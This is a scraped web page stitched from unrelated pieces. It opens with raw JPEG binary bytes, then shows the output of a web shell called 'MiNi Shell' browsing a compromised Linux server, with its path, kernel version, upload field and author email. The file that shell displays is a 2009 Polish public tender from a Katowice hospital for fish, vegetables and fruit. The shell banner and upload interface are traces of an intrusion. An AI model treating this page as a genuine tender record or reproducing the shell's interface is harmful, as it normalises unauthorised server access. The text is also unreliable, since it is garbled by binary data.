JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090219/33988-N-2009.html

<p class="kh_header"><b>Katowice: DOSTAWA MROŻONYCH RYB, WARZYW, OWOCÓW; RYB; ZIEMNIAKÓW; OWOCÓW I OWOCÓW SUSZONYCH; WARZYW STRĄCZKOWYCH SUSZONYCH; PIECZAREK; WARZYW KORZENIOWYCH KAPUSTNYCH, LIŚCIASTYCH; WARZYW KONSERWOWANYCH, KAPUSTY, OGÓRKÓW KISZONYCH; WARZYW MŁODYCH, SEZONOWYCH</b><br>
<b>Numer ogłoszenia: 33988 - 2009; data zamieszczenia: 19.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Centralny Szpital Kliniczny im. Prof. Kornela Gibińskiego Śląskiej Akademii Medycznej w Katowicach , ul. Medyków 14, 40-752 Katowice, woj. śląskie, tel. 032 7894131, faks 032 2526727, 7894001-02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.csk.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MROŻONYCH RYB, WARZYW, OWOCÓW; RYB; ZIEMNIAKÓW; OWOCÓW I OWOCÓW SUSZONYCH; WARZYW STRĄCZKOWYCH SUSZONYCH; PIECZAREK; WARZYW KORZENIOWYCH KAPUSTNYCH, LIŚCIASTYCH; WARZYW KONSERWOWANYCH, KAPUSTY, OGÓRKÓW KISZONYCH; WARZYW MŁODYCH, SEZONOWYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet nr 1 -  Mrożone ryby i warzywa
1.Ryba mrożona mintaj - filet, sposób mrożenia shatter pack	kg	40	480
2.Ryba mrożona dorsz - filet, sposób mrożenia shatter pack	kg	40	480
3.Tilapia mrożona - filet bez skóry 200-255 g, sposób mrożenia shatter pack	kg	50	50
4.Panga, jasno różowa, mrożone filety bez ości 200-220 g, sposób mrożenia shatter pack	kg	50	600
5.Brukselka mrożona op. 2.50 kg	kg	10	60
6.Brokuły mrożone	kg	40	160
7.Szpinak mrożony op. 2.50 kg	kg	160	1 920
8.Mieszanka kompotowa 	kg	50	500
9.Truskawka mrożona op. 2.50 kg	kg	80	800
10.Mieszanka warzywna mrożona 4 składnikowa (por, pietruszka, marchew, seler) krojona w paski	kg	250	3 000
11.Kalafior mrożony op. 2.50 - 5.00 kg	kg	30	180
Pakiet nr 2 -  Ryby
1.Śledź - filet solony matias	Kg	80	80
Pakiet nr 3 -  Ziemniaki
1.Ziemniaki jadalne późne workowane 30 kg, typ kulinarny A, AB, B	kg	5 600	56 000
2.Ziemniaki jadalne wczesne 	kg	5 000	10 000
Pakiet nr 4 -  Owoce i warzywa suszone
1.Jabłko konsumpcyjne kl.I , średnio-owocowe	kg	570	6 840
2.Banan 	kg	100	600
3.Truskawka świeża	kg	150	300
4.Owoce suszone 3 składniki (śliwki, jabłko, gruszka)	kg	10	10
Pakiet nr 5 -  Warzywa suche strączkowe
1.Fasola biała typ Jaś	kg	30	360
2.Groch łuskany	kg	15	180
Pakiet nr 6 -  Pieczarka
1.Pieczarka	Kg	50	600
Pakiet nr 7 -Warzywa korzeniowe
1.Burak ćwikłowy	Kg	450	4 050
2.Marchew korzeń	Kg	840	7 560
3.Pietruszka korzeń	Kg	200	1 800
4.Seler korzeń	Kg	300	2 700
5.Kapusta biała główki	Kg	200	1 600
6.Kapusta czerwona główki	Kg	100	800
7.Kapusta pekińska główki	Kg	80	960
8.Cebula zaschnięta	Kg	80	720
9.Por	Kg	20	180
10.Koper zielony okres letni - pęczek nie mniej niż 70 g	Szt	400	2 800
11.Koper zielony okres zimowy - pęczek nie mniej niż 35 g	Szt	300	1 500
12.Pietruszka zielona okres letni - pęczek nie mniej niż 100 g	Szt	350	2 450
13.Pietruszka zielona okres letni - pęczek nie mniej niż 50 g	Szt	220	1 100
14.Czosnek	Kg	2	24
  Warzywa korzeniowe
Pakiet nr 8 - Kiszonki
1.Kapusta kiszona biała 5-10 kg	kg	150	1 350
2.Kapusta kiszona biała młoda 5 kg	kg	80	240
3.Ogórek kiszony 3-6 kg	kg	30	270
4.Ogórki małosolne 3-6 kg	kg	30	90
Pakiet nr 9 - Warzywa młode, sezonowe
1.Marchew młoda	kg	600	1 800
2.Pietruszka młoda	kg	60	180
3.Burak ćwikłowy	kg	300	900
4.Por młody	Szt	30	90
5.Kapusta biała młoda	Szt	200	800
6.Kapusta czerwona młoda	Szt	80	320
7.Cebula bez szczypioru świeża	kg	60	180
8.Pomidor średni (50g)	kg	300	1 500
9.Ogórek zielony świeży	kg	120	960
10.Kalafior	Szt	200	800
11.Fasolka szparagowa	kg	150	600
12.Sałata zielona głowiasta	Szt	320	3 840
13.Sałata lodowa	Szt	35	420
14.Cebula czerwona	kg	2	24
15.Papryka zielona sezon średnioowocowa	kg	100	300
16.Papryka świeża mix	kg	4	48
17.Botwinka	Szt	150	900
18.Kalarepka	Szt	150	900
19.Rzodkiewka pęczki nie mniej niż 10 szt	Szt	60	480
20.Szczypiorek pęczki nie mniej niż 70 g	Szt	20	240
21.Brokuły	Szt	80	320
22.Brukselka	kg	20	80
23.Seler młody	kg	150	450.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-0, 15.22.10.00-3, 15.33.11.70-9, 03.31.10.00-2, 03.21.21.00-1, 03.22.20.00-3, 15.33.24.10-1, 03.21.22.10-5, 03.22.12.60-6, 03.22.11.00-0, 03.22.14.00-0, 03.22.12.00-9, 15.33.14.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunkiem ubiegania się przez Wykonawcę o udzielenie zamówienia publicznego jest:
a) posiadanie uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b) posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia  lub przedstawienie pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c) znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d) nie podleganie wykluczeniu z postępowania o udzieleniu zamówienia.
Opis oceny  spełnienia warunków:
- przedstawienie wymaganych przez Zamawiającego dokumentów,
-wykazanie wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw w okresie ostatnich trzech lat  przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców (co najmniej 2 zamówienia lub więcej o łącznej wartości odpowiadającej minimum wartości składanej oferty,) oraz załączenia  dokumentów potwierdzających, że dostawy te zostały wykonane należycie,
- złożenie oświadczenia art. 22 ust 1 pkt 1-4 oraz oświadczenia art. 24 ust 1 pkt 1-10 oraz ust.2 pkt. 1-4 ustawy Prawo zamówień publicznych.

Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie spełnia/nie spełnia. 


W przypadku nie spełnienia jakiegokolwiek warunku udziału w postępowaniu Wykonawca zostanie wykluczony z postępowania na podstawie art.24 ustawy PZP.
Podmioty występujące wspólnie muszą ustanowić i wskazać Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu o udzielenie niniejszego zamówienia i zawarcia umowy w sprawie zamówienia publicznego (zgodnie z art. 23 ust.2 ustawy Prawo zamówień publicznych). Dokument pełnomocnictwa musi być załączony do oferty i zawierać w szczególności wskazanie: postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania obejmujący przede wszystkim:
- reprezentowanie konsorcjum w postępowaniu o udzielenie zamówienia publicznego,
- zaciąganie w imieniu konsorcjum zobowiązań, zawierania umów,
- złożenie wniosku wspólnie,
- prowadzenie korespondencji i podejmowanie zobowiązań związanych z postępowaniem o zamówienie publiczne.
Dokument pełnomocnictwa musi być podpisany w imieniu wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia w tym Wykonawcę ustanowionego jako Pełnomocnika i przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawcy.
Warunki wymienione zamawiający uzna za spełnione, jeżeli wykonawcy występujący wspólnie przedstawią dowody, że łącznie spełniają lub przekraczają warunki minimalne.
Wykonawca poza własnymi dokumentami i oświadczeniami musi także dostarczyć dokumenty i oświadczenia każdego podmiotu.
Wykonawcy podpisują składane przez siebie dokumenty, pełnomocnik podpisuje natomiast wszystkie dokumenty składające się na ofertę..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający wymaga, aby Wykonawca dołączył do oferty następujące dokumenty, stanowiące załączniki do niniejszej Specyfikacji Istotnych Warunków Zamówienia:
- wypełniony formularz oferty - zał. nr 1 SIWZ,
- wypełniony formularz asortymentowo-cenowy - zał. nr 2 SIWZ
- Oświadczenie art. 22 ust 1 pkt 1-4 ustawy Prawo zamówień publicznych - zał. nr 3 SIWZ,
- Oświadczenie art. 24 ust 1 pkt 1-10 oraz ust.2 pkt. 1-4 ustawy Prawo zamówień publicznych - zał. nr 4 SIWZ,
- wykaz dostaw - zał. nr 5 SIWZ
1.W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych, Zamawiający żąda następujących dokumentów:
A.Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia 
o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składaniem ofert.
B.Aktualnych zaświadczeń właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2.W celu potwierdzenia oferowanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Zamawiający żąda następujących dokumentów:
Wykaz wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw w okresie ostatnich trzech lat  przed
dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia  dokumentów potwierdzających, że dostawy te zostały wykonane należycie.
3.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
zamiast dokumentów, o których mowa w pkt 1 A i B  składa dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek  na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
Dokumenty, o których mowa w pkt. 3 a powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Dokument, o którym mowa w pkt. 3 b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę  lub miejsce zamieszkania, nie wydaje się w/w dokumentów oraz dokumentów, o których mowa w pkt 3 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty.
Zamawiający uzna ofertę za ważną Wykonawcy, który do oferty dołączy wszystkie wyżej wymienione dokumenty potwierdzające spełnienie warunków udziału w postępowaniu o udzielenie zamówienia publicznego. 
Zamawiający odnotuje spełnienie powyższych warunków na druku ZP-17 - spełnia/nie spełnia.

Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.csk.katowice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Centralny Szpital Kliniczny im. prof. Kornela Gibińskiego Śląskiego Uniwersytetu Medycznego w Katowicach 
40-752 Katowice, ul. Medyków 14, pok PP104.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2009 godzina 09:00, miejsce: Samodzielny Publiczny Centralny Szpital Kliniczny im. prof. Kornela Gibińskiego Śląskiego Uniwersytetu Medycznego w Katowicach 
40-752 Katowice, ul. Medyków 14, kancelaria.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 -  Mrożone ryby i warzywa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Ryba mrożona mintaj - filet, sposób mrożenia shatter pack	kg	40	480
2.Ryba mrożona dorsz - filet, sposób mrożenia shatter pack	kg	40	480
3.Tilapia mrożona - filet bez skóry 200-255 g, sposób mrożenia shatter pack	kg	50	50
4.Panga, jasno różowa, mrożone filety bez ości 200-220 g, sposób mrożenia shatter pack	kg	50	600
5.Brukselka mrożona op. 2.50 kg	kg	10	60
6.Brokuły mrożone	kg	40	160
7.Szpinak mrożony op. 2.50 kg	kg	160	1 920
8.Mieszanka kompotowa 	kg	50	500
9.Truskawka mrożona op. 2.50 kg	kg	80	800
10.Mieszanka warzywna mrożona 4 składnikowa (por, pietruszka, marchew, seler) krojona w paski	kg	250	3 000
11.Kalafior mrożony op. 2.50 - 5.00 kg	kg	30	180.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.10.00-3, 15.33.11.70-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 -  Ryby.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Śledź - filet solony matias	Kg	80	80.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.31.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 -  Ziemniaki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Ziemniaki jadalne późne workowane 30 kg, typ kulinarny A, AB, B	kg	5 600	56 000
2.Ziemniaki jadalne wczesne 	kg	5 000	10 000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 -  Owoce i warzywa suszone.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Jabłko konsumpcyjne kl.I , średnio-owocowe	kg	570	6 840
2.Banan 	kg	100	600
3.Truskawka świeża	kg	150	300
4.Owoce suszone 3 składniki (śliwki, jabłko, gruszka)	kg	10	10.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.20.00-3, 15.22.24.10-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 -  Warzywa suche strączkowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Fasola biała typ Jaś	kg	30	360
2.Groch łuskany	kg	15	180.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.22.10-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 -  Pieczarka.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Pieczarka	Kg	50	600.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.12.60-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 -Warzywa korzeniowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Burak ćwikłowy	Kg	450	4 050
2.Marchew korzeń	Kg	840	7 560
3.Pietruszka korzeń	Kg	200	1 800
4.Seler korzeń	Kg	300	2 700
5.Kapusta biała główki	Kg	200	1 600
6.Kapusta czerwona główki	Kg	100	800
7.Kapusta pekińska główki	Kg	80	960
8.Cebula zaschnięta	Kg	80	720
9.Por	Kg	20	180
10.Koper zielony okres letni - pęczek nie mniej niż 70 g	Szt	400	2 800
11.Koper zielony okres zimowy - pęczek nie mniej niż 35 g	Szt	300	1 500
12.Pietruszka zielona okres letni - pęczek nie mniej niż 100 g	Szt	350	2 450
13.Pietruszka zielona okres letni - pęczek nie mniej niż 50 g	Szt	220	1 100
14.Czosnek	Kg	2	24.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.00-0, 03.22.14.00-0, 03.22.13.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8 - Kiszonki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kapusta kiszona biała 5-10 kg	kg	150	1 350
2.Kapusta kiszona biała młoda 5 kg	kg	80	240
3.Ogórek kiszony 3-6 kg	kg	30	270
4.Ogórki małosolne 3-6 kg	kg	30	90.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.14.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9 - Warzywa młode, sezonowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Marchew młoda	kg	600	1 800
2.Pietruszka młoda	kg	60	180
3.Burak ćwikłowy	kg	300	900
4.Por młody	Szt	30	90
5.Kapusta biała młoda	Szt	200	800
6.Kapusta czerwona młoda	Szt	80	320
7.Cebula bez szczypioru świeża	kg	60	180
8.Pomidor średni (50g)	kg	300	1 500
9.Ogórek zielony świeży	kg	120	960
10.Kalafior	Szt	200	800
11.Fasolka szparagowa	kg	150	600
12.Sałata zielona głowiasta	Szt	320	3 840
13.Sałata lodowa	Szt	35	420
14.Cebula czerwona	kg	2	24
15.Papryka zielona sezon średnioowocowa	kg	100	300
16.Papryka świeża mix	kg	4	48
17.Botwinka	Szt	150	900
18.Kalarepka	Szt	150	900
19.Rzodkiewka pęczki nie mniej niż 10 szt	Szt	60	480
20.Szczypiorek pęczki nie mniej niż 70 g	Szt	20	240
21.Brokuły	Szt	80	320
22.Brukselka	kg	20	80
23.Seler młody	kg	150	450.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com